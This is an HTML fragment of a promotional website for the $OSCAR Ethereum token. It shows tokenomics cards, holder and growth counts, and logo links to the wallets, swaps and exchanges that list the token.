                            </div><img src="674a0e5018d16130563f39fb_merch-new.webp" loading="eager" sizes="(max-width: 479px) 100vw, (max-width: 767px) 16vw, (max-width: 991px) 17vw, (max-width: 1439px) 22vw, 308.5px" srcset="674a0e5018d16130563f39fb_merch-new-p-500.webp 500w, 674a0e5018d16130563f39fb_merch-new-p-800.webp 800w, 674a0e5018d16130563f39fb_merch-new-p-1080.webp 1080w, 674a0e5018d16130563f39fb_merch-new.webp 1343w" alt="" class="card-image ellipal story">
                        </div>
                    </div>
                </div>
                <div class="cards-second-grid third-row communitysoon">
                    <div id="w-node-c26312a1-48e3-3973-2894-2a3ee8a5dce7-22318e3f" data-w-id="c26312a1-48e3-3973-2894-2a3ee8a5dce7" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="674a0e5026206f7036efeb69_Stake.webp" loading="lazy" sizes="(max-width: 479px) 94vw, (max-width: 767px) 28vw, (max-width: 991px) 29vw, (max-width: 1439px) 30vw, 411.328125px" srcset="674a0e5026206f7036efeb69_Stake-p-500.webp 500w, 674a0e5026206f7036efeb69_Stake-p-800.webp 800w, 674a0e5026206f7036efeb69_Stake.webp 1484w" alt="" class="simple-card-image comingsooncardimage"></div>
                            <div class="card-text-holder">
                                <div class="card-title black-text">Coming Soon</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">Stake &amp; Earn</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-c26312a1-48e3-3973-2894-2a3ee8a5dcf1-22318e3f" data-w-id="c26312a1-48e3-3973-2894-2a3ee8a5dcf1" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="67445f43bd27710e137a0810_Collar.png" loading="lazy" sizes="(max-width: 479px) 94vw, (max-width: 767px) 28vw, (max-width: 991px) 29vw, (max-width: 1439px) 30vw, 411.3359375px" srcset="67445f43bd27710e137a0810_Collar-p-500.png 500w, 67445f43bd27710e137a0810_Collar-p-800.png 800w, 67445f43bd27710e137a0810_Collar-p-1080.png 1080w, 67445f43bd27710e137a0810_Collar.png 1484w" alt="" class="simple-card-image comingsooncard"></div>
                            <div class="card-text-holder small">
                                <div class="card-title black-text">Coming Soon</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">The Ascension - $COLLAR</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-b2d48605-3257-f78f-5423-0b9f66f5a80c-22318e3f" data-w-id="b2d48605-3257-f78f-5423-0b9f66f5a80c" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background comingsooncard">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="674a0e50d35c858d8f69add7_Burn.webp" loading="lazy" sizes="(max-width: 479px) 94vw, (max-width: 767px) 28vw, (max-width: 991px) 29vw, (max-width: 1439px) 30vw, 411.3359375px" srcset="674a0e50d35c858d8f69add7_Burn-p-500.webp 500w, 674a0e50d35c858d8f69add7_Burn-p-800.webp 800w, 674a0e50d35c858d8f69add7_Burn.webp 1484w" alt="" class="simple-card-image comingsooncard"></div>
                            <div class="card-text-holder small">
                                <div class="card-title black-text">Coming Soon</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">BURN 'EM&nbsp;ALL(?)</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="cards-second-grid third-row fourth-row">
                    <div id="w-node-_9357b387-ceb8-4f38-faa6-bf034278262a-22318e3f" data-w-id="9357b387-ceb8-4f38-faa6-bf034278262a" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="6720ca2cf3750cb622318e9b_Second%20Card%20Image.svg" loading="lazy" alt="" class="simple-card-image"></div>
                            <div class="card-text-holder">
                                <div class="card-title black-text">Total Holders</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">54,646</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-_9357b387-ceb8-4f38-faa6-bf0342782634-22318e3f" data-w-id="9357b387-ceb8-4f38-faa6-bf0342782634" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="6720ca2cf3750cb622318e9b_Second%20Card%20Image.svg" loading="lazy" alt="" class="simple-card-image"></div>
                            <div class="card-text-holder small">
                                <div class="card-title black-text">Daily X Growth</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">⬆ 240 followers &nbsp;⬆ 2,124 mentions</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-c3215e11-f65b-ed3c-fbb8-1e57abfde5a6-22318e3f" data-w-id="c3215e11-f65b-ed3c-fbb8-1e57abfde5a6" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="6720ca2cf3750cb622318e9b_Second%20Card%20Image.svg" loading="lazy" alt="" class="simple-card-image"></div>
                            <div class="card-text-holder small">
                                <div class="card-title black-text">Daily Telegram Growth</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">⬆ 240 members</p>
                                </div>
                            </div>
                        </div>
                    </div>
                    <div id="w-node-f67d3460-5947-c1df-7479-ad41c8b6476e-22318e3f" data-w-id="f67d3460-5947-c1df-7479-ad41c8b6476e" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;" class="card-background">
                        <div class="card-container">
                            <div class="card-image-holder"><img src="6720ca2cf3750cb622318e9b_Second%20Card%20Image.svg" loading="lazy" alt="" class="simple-card-image"></div>
                            <div class="card-text-holder small">
                                <div class="card-title black-text">Growth Data Title</div>
                                <div class="experience-paragraph-holder">
                                    <p class="black-text">Growth Metric goes here.</p>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <div id="integration" class="section">
        <div data-w-id="c78f219d-acfe-cf0c-7273-cb7eb8df08a1" class="effortlessly-integration-section">
            <div class="container">
                <div class="effortlessly-integration-container">
                    <div class="center-title">
                        <div class="title-holder">
                            <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                                <h1 class="title">Tokenomics</h1>
                            </div>
                            <div class="fade-in-move-on-scroll" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                                <p class="paragraph-13"><span class="text-span-3">0xeBb66a88cEdd12bfE3a289df6DFEe377F2963F12</span></p><a id="w-node-_654df4e0-f6d0-bf35-6571-2e6ec5781031-22318e3f" href="https://etherscan.io/token/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" class="button navbar-button etherscanbutton w-button">View Etherscan</a>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="effortlessly-integration-wrapper">
                <div class="logo-holder-effortlessly-integration" style="will-change: transform; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                    <div class="cards-second-grid tokenomicscardgrid">
                        <div id="w-node-e7106b77-1712-2b6c-99b3-7642a2733c51-9ddc7ad4" data-w-id="e7106b77-1712-2b6c-99b3-7642a2733c51" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="674a0e51d942c4d8decc0dcd_Tokenomics-Ethereum.webp" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="674a0e51d942c4d8decc0dcd_Tokenomics-Ethereum-p-500.webp 500w, 674a0e51d942c4d8decc0dcd_Tokenomics-Ethereum.webp 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder">
                                    <div class="card-title black-text">⧫ Ethereum </div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text">ERC-20 Network </p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="w-node-_1cf911b2-9f3e-45d3-854a-b8ba5de63478-9ddc7ad4" data-w-id="1cf911b2-9f3e-45d3-854a-b8ba5de63478" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="674a0e51df90cc9d18536bb0_Tokenomics-TotalSupply.webp" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="674a0e51df90cc9d18536bb0_Tokenomics-TotalSupply-p-500.webp 500w, 674a0e51df90cc9d18536bb0_Tokenomics-TotalSupply.webp 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder">
                                    <div class="card-title black-text">Total Supply</div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text">1,000,000,000<strong> </strong>$OSCAR</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="w-node-_21407f72-3469-217c-e78a-c0ea821e269a-9ddc7ad4" data-w-id="21407f72-3469-217c-e78a-c0ea821e269a" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="674a0e5154cff57bfe496a8d_Tokenomics-Contract.webp" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="674a0e5154cff57bfe496a8d_Tokenomics-Contract-p-500.webp 500w, 674a0e5154cff57bfe496a8d_Tokenomics-Contract.webp 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder">
                                    <div class="card-title black-text">Contract</div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text">Renounced forever</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="w-node-_1cf911b2-9f3e-45d3-854a-b8ba5de63496-9ddc7ad4" data-w-id="1cf911b2-9f3e-45d3-854a-b8ba5de63496" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="67238447748743b375a01470_Tokenomics-Liquidity.png" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="67238447748743b375a01470_Tokenomics-Liquidity-p-500.png 500w, 67238447748743b375a01470_Tokenomics-Liquidity.png 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder">
                                    <div class="card-title black-text">Liquidity</div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text">Burned to a crisp</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="w-node-_1cf911b2-9f3e-45d3-854a-b8ba5de6348c-9ddc7ad4" data-w-id="1cf911b2-9f3e-45d3-854a-b8ba5de6348c" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="674a0e51f745268d9529d151_Tokenomics-Taxes.webp" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="674a0e51f745268d9529d151_Tokenomics-Taxes-p-500.webp 500w, 674a0e51f745268d9529d151_Tokenomics-Taxes.webp 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder">
                                    <div class="card-title black-text">Taxes</div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text">0/0%</p>
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div id="w-node-_1cf911b2-9f3e-45d3-854a-b8ba5de63482-9ddc7ad4" data-w-id="1cf911b2-9f3e-45d3-854a-b8ba5de63482" class="card-background" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                            <div class="card-container">
                                <div class="card-image-holder"><img src="674a0e50e773b0645b4d111e_Tokenomics-BurnedSupply.webp" loading="lazy" sizes="(max-width: 479px) 46vw, (max-width: 767px) 28vw, (max-width: 991px) 30vw, 15vw" srcset="674a0e50e773b0645b4d111e_Tokenomics-BurnedSupply-p-500.webp 500w, 674a0e50e773b0645b4d111e_Tokenomics-BurnedSupply.webp 800w" alt="" class="simple-card-image"></div>
                                <div class="card-text-holder small">
                                    <div class="card-title black-text burnedtext">Burned Supply</div>
                                    <div class="experience-paragraph-holder">
                                        <p class="black-text numberhighlight">🔥 <a href="https://etherscan.io/token/0xebb66a88cedd12bfe3a289df6dfee377f2963f12?a=0x000000000000000000000000000000000000dead"><strong class="bold-text-7">10.45%</strong> </a><a href="https://etherscan.io/token/0xebb66a88cedd12bfe3a289df6dfee377f2963f12?a=0x000000000000000000000000000000000000dead" target="_blank" class="linktext">0xdEaD</a></p>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="iphone-holder-effortlessly-integration" style="will-change: transform; transform: translate3d(0px, 200px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;">
                    <div class="effortlessly-integration---iphone-holder"><img src="6721340a44415ba9a2ba5c6d_blank.png" loading="eager" sizes="(max-width: 479px) 200px, (max-width: 991px) 320px, 430px" srcset="6721340a44415ba9a2ba5c6d_blank-p-500.png 500w, 6721340a44415ba9a2ba5c6d_blank.png 800w" alt="" class="iphone-image">
                        <div class="iphone-screen"><img src="6720ca2cf3750cb622318e64_Hero%20Iphone%20Image.webp" loading="eager" alt="" sizes="390.453125px" srcset="6720ca2cf3750cb622318e64_Hero%2520Iphone%2520Image-p-500.jpg 500w, 6720ca2cf3750cb622318e64_Hero%20Iphone%20Image.webp 729w" class="iphone-screen-image"></div>
                    </div>
                </div>
                <div class="light-holder" style="will-change: opacity, filter, transform; opacity: 0; filter: blur(0px); transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"></div>
            </div>
        </div>
    </div>
    <div id="features" class="section">
        <div class="sticky-section">
            <div class="container wide-container">
                <div class="container narrative">
                    <div class="logo-grid-holder">
                        <h1 class="title black-text listingtitle">Swaps &amp; Web3 wallets</h1>
                        <div class="w-layout-grid logo-grid cex">
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b616-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.coinbase.com/en-gb/wallet/downloads" target="_blank" class="w-inline-block"><img src="672396f9e4f5ba4a5c21fa03_CBwallet.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b619-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://hk.okx.com/download" target="_blank" class="w-inline-block"><img src="672396f9ab153e98b96a55fd_OKXwallet.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b61c-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://app.toadswap.org/" target="_blank" class="w-inline-block"><img src="674ac1411ffb5941e2b56d2d_Toad.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b61f-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://app.uniswap.org/explore/tokens/ethereum/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" target="_blank" class="w-inline-block"><img src="67238e794f285c2321c0a1cc_Uni.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b622-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.binance.com/en/web3wallet" target="_blank" class="w-inline-block"><img src="6724d89922562cfbb861adaf_binance.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b625-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.bybit.com/en/web3/home" target="_blank" class="w-inline-block"><img src="674ac168c7303bbac85df3ff_bybit.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b628-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://web3.bitget.com/en/wallet-download?type=1" target="_blank" class="w-inline-block"><img src="6724d8999f21795e2406e310_bitget.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b62b-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.gate.io/web3" target="_blank" class="w-inline-block"><img src="6724d8998c9c6cede2061db2_gateweb3.png" loading="lazy" alt="" class="logo-small"></a></div>
                        </div>
                        <div class="w-layout-grid logo-grid cex secondrowcex">
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b62f-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://trustwallet.com/download" target="_blank" class="w-inline-block"><img src="6727c8112bfc8c81c0123e8e_Trust.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b635-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://openocean.finance/" target="_blank" class="w-inline-block"><img src="6727c8115215eb780ba8b34b_Openocean.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b638-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.exodus.com/download/" target="_blank" class="w-inline-block"><img src="6727c811dd9b588ebe653efe_Exodus.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_5975a3d7-a642-2706-aec8-37561e456693-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://tangem.com/en/pricing/" target="_blank" class="w-inline-block"><img src="672a707f7512f5ef35f13643_Tangem.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-d646ef96-0069-e113-fda2-e92c1de5c07d-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.ellipal.com/" target="_blank" class="w-inline-block"><img src="6747043e913120185edeeee4_EllipalPartner.png" loading="lazy" sizes="(max-width: 479px) 42vw, (max-width: 767px) 18vw, (max-width: 991px) 20vw, (max-width: 1439px) 10vw, 140.625px" srcset="6747043e913120185edeeee4_EllipalPartner-p-500.png 500w, 6747043e913120185edeeee4_EllipalPartner.png 752w" alt="" class="logo-small"></a></div>
                            <div id="w-node-_40fb973d-9091-b708-2c9d-a63ede542cd7-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://shibaswap.com/swap/0xebb66a88cedd12bfe3a289df6dfee377f2963f12" target="_blank" class="w-inline-block"><img src="6746ff9c9e09b9f0f25e840e_ShibaSwap.png" loading="lazy" alt="" class="logo-small"></a></div>
                        </div>
                        <h1 class="title black-text listingtitle cextitle">CEXs</h1>
                        <div class="w-layout-grid logo-grid cex">
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b63e-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.xt.com/en/trade/oscar_usdt" target="_blank" class="w-inline-block"><img src="672267d46ce0a1ae0234736a_Group%2013854.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b641-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://ascendex.com/en/cashtrade-spottrading/usdt/oscar" target="_blank" class="w-inline-block"><img src="672267d470ad252bddf55366_AscendEX.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b650-22318e3f" class="logo-small-container disabled" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.fameex.com/en-US/trade/oscar-usdt" target="_blank" class="w-inline-block"><img src="672395575dbef460e3558587_FameEX.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b653-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.uzx.com/#/exchange/oscar_usdtpottrading/usdt/oscar" target="_blank" class="w-inline-block"><img src="672a34e821890df5f0ca6f57_UZX.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_54583b4f-738e-0500-9e91-cbba006da7b7-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://bilaxy.com/trade/OSCAR_ETH" target="_blank" class="w-inline-block"><img src="6746ff9caa15f02ef139d1a7_Bilaxy.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b647-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://cetoex.com/trade/OSCARUSDT" target="_blank" class="w-inline-block"><img src="67238e799dd531eb210cb34a_CetoEX.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b64d-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://nonkyc.io/market/OSCAR_USDT" target="_blank" class="w-inline-block"><img src="6723955832eb260f7fc30373_Vindax.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_78604e9b-decd-6984-b3cf-e87248f6b644-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://dex-trade.com/spot/trading/OSCARUSDT" target="_blank" class="w-inline-block"><img src="67238e79ed2c8423e34190d0_DexTrade.png" loading="lazy" alt="" class="logo-small"></a></div>
                        </div>
                        <div class="w-layout-grid logo-grid cex secondrowcex">
                            <div id="w-node-e6ce4205-1656-915c-0a31-cdcd1eb8b5a2-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://nexdax.com/exchange-base.html?symbol=OSCAR_USDT" target="_blank" class="w-inline-block"><img src="672267d4782a45330ee6c0ff_Nexdax.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_64bd5718-e611-9335-203f-f2d65d379ae5-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://www.coininn.com/coin/OSCAR" target="_blank" class="w-inline-block"><img src="6746ff9c42f140ba525c5235_CoinInn.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_5048fe71-7934-a163-9ffd-dc24c239b77b-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://bitstorage.finance/spot/trading/OSCARUSDT" target="_blank" class="w-inline-block"><img src="672267d4eea52cc5357e96ac_Bitstorage.png" loading="lazy" alt="" class="logo-small"></a></div>
                            <div id="w-node-_4f553bff-7a8a-0e9d-f92d-c647068f39de-22318e3f" class="logo-small-container" style="opacity: 1; transform: translate3d(0px, 0px, 0px) scale3d(1, 1, 1) rotateX(0deg) rotateY(0deg) rotateZ(0deg) skew(0deg, 0deg); transform-style: preserve-3d;"><a href="https://nonkyc.io/market/OSCAR_USDT" target="_blank" class="w-inline-block"><img src="672267d4490827bb52129b45_NonKYC.png" loading="lazy" alt="" class="logo-small"></a></div>
                        </div>
                        <h1 class="title black-text listingtitle cextitle">Partners</h1>
                        <div class="w-layout-grid logo-grid cex partners">
